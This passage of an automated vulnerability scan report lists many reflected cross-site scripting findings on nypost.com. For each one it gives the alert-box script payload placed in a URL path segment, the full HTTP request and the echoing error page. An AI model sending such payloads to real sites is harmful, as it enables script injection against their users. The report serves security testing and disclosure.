Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 719
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:16 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortalfcab8<script>alert(1)</script>fad90052008/nypost/blocks/weather/weather.css</p>
...[SNIP]...

1.330. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/weather/weather.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/weather/weather.css

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f05d2<script>alert(1)</script>8125c0cbbdc was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypostf05d2<script>alert(1)</script>8125c0cbbdc/blocks/weather/weather.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 719
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:18 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypostf05d2<script>alert(1)</script>8125c0cbbdc/blocks/weather/weather.css</p>
...[SNIP]...

1.331. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/weather/weather.css [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/weather/weather.css

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 5b935<script>alert(1)</script>ed6165a3cd1 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/blocks5b935<script>alert(1)</script>ed6165a3cd1/weather/weather.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 719
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:21 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/blocks5b935<script>alert(1)</script>ed6165a3cd1/weather/weather.css</p>
...[SNIP]...

1.332. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/weather/weather.css [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/weather/weather.css

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload ea0bd<script>alert(1)</script>20c0fe209e3 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/blocks/weatherea0bd<script>alert(1)</script>20c0fe209e3/weather.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 719
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:23 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/blocks/weatherea0bd<script>alert(1)</script>20c0fe209e3/weather.css</p>
...[SNIP]...

1.333. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/weather/weather.css [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/weather/weather.css

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 548c6<script>alert(1)</script>71b9c8ef2a6 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/blocks/weather/weather.css548c6<script>alert(1)</script>71b9c8ef2a6 HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 719
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:28 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/blocks/weather/weather.css548c6<script>alert(1)</script>71b9c8ef2a6</p>
...[SNIP]...

1.334. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/css/home.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/css/home.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 947af<script>alert(1)</script>23c32321376 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig947af<script>alert(1)</script>23c32321376/WebPortal/nypost/css/home.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 705
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:22 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig947af<script>alert(1)</script>23c32321376/WebPortal/nypost/css/home.css</p>
...[SNIP]...

1.335. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/css/home.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/css/home.css

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 5e3c2<script>alert(1)</script>d07d7cf6712 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal5e3c2<script>alert(1)</script>d07d7cf6712/nypost/css/home.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 705
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:24 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal5e3c2<script>alert(1)</script>d07d7cf6712/nypost/css/home.css</p>
...[SNIP]...

1.336. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/css/home.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/css/home.css

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f77af<script>alert(1)</script>f8dcfe35e3f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypostf77af<script>alert(1)</script>f8dcfe35e3f/css/home.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 705
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:26 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypostf77af<script>alert(1)</script>f8dcfe35e3f/css/home.css</p>
...[SNIP]...

1.337. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/css/home.css [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/css/home.css

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload a3a59<script>alert(1)</script>31c009fa7ac was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/cssa3a59<script>alert(1)</script>31c009fa7ac/home.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 705
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:27 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/cssa3a59<script>alert(1)</script>31c009fa7ac/home.css</p>
...[SNIP]...

1.338. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/css/home.css [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/css/home.css

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 543cf<script>alert(1)</script>3db549e2cb1 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/css/home.css543cf<script>alert(1)</script>3db549e2cb1 HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 705
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:33 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/css/home.css543cf<script>alert(1)</script>3db549e2cb1</p>
...[SNIP]...

1.339. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/css/home_default.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/css/home_default.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5756b<script>alert(1)</script>40a0af1717f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig5756b<script>alert(1)</script>40a0af1717f/WebPortal/nypost/css/home_default.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 713
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:26 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig5756b<script>alert(1)</script>40a0af1717f/WebPortal/nypost/css/home_default.css</p>
...[SNIP]...

1.340. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/css/home_default.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/css/home_default.css

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 627ec<script>alert(1)</script>050937d8794 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal627ec<script>alert(1)</script>050937d8794/nypost/css/home_default.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 713
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:28 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal627ec<script>alert(1)</script>050937d8794/nypost/css/home_default.css</p>
...[SNIP]...

1.341. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/css/home_default.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/css/home_default.css

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload e586c<script>alert(1)</script>bab62a0f4d1 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nyposte586c<script>alert(1)</script>bab62a0f4d1/css/home_default.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 713
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:31 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nyposte586c<script>alert(1)</script>bab62a0f4d1/css/home_default.css</p>
...[SNIP]...

1.342. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/css/home_default.css [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/css/home_default.css

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 28e19<script>alert(1)</script>d2f4df373bd was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/css28e19<script>alert(1)</script>d2f4df373bd/home_default.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 713
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:33 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/css28e19<script>alert(1)</script>d2f4df373bd/home_default.css</p>
...[SNIP]...

1.343. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/css/home_default.css [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/css/home_default.css

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 3dee8<script>alert(1)</script>c016ce8d31b was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/css/home_default.css3dee8<script>alert(1)</script>c016ce8d31b HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 713
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:35 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/css/home_default.css3dee8<script>alert(1)</script>c016ce8d31b</p>
...[SNIP]...

1.344. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/css/jquery.jcarousel.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/css/jquery.jcarousel.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 17cbb<script>alert(1)</script>90941141b50 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig17cbb<script>alert(1)</script>90941141b50/WebPortal/nypost/css/jquery.jcarousel.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 717
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:37 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig17cbb<script>alert(1)</script>90941141b50/WebPortal/nypost/css/jquery.jcarousel.css</p>
...[SNIP]...

1.345. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/css/jquery.jcarousel.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/css/jquery.jcarousel.css

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload ce3c1<script>alert(1)</script>428ee219182 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortalce3c1<script>alert(1)</script>428ee219182/nypost/css/jquery.jcarousel.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 717
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:40 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortalce3c1<script>alert(1)</script>428ee219182/nypost/css/jquery.jcarousel.css</p>
...[SNIP]...

1.346. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/css/jquery.jcarousel.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/css/jquery.jcarousel.css

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 4f55c<script>alert(1)</script>556fea41cc7 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost4f55c<script>alert(1)</script>556fea41cc7/css/jquery.jcarousel.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 717
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:41 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost4f55c<script>alert(1)</script>556fea41cc7/css/jquery.jcarousel.css</p>
...[SNIP]...

1.347. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/css/jquery.jcarousel.css [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/css/jquery.jcarousel.css

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 6811e<script>alert(1)</script>1423b347ed was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/css6811e<script>alert(1)</script>1423b347ed/jquery.jcarousel.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 716
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:43 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/css6811e<script>alert(1)</script>1423b347ed/jquery.jcarousel.css</p>
...[SNIP]...

1.348. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/css/jquery.jcarousel.css [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/css/jquery.jcarousel.css

Issue detail

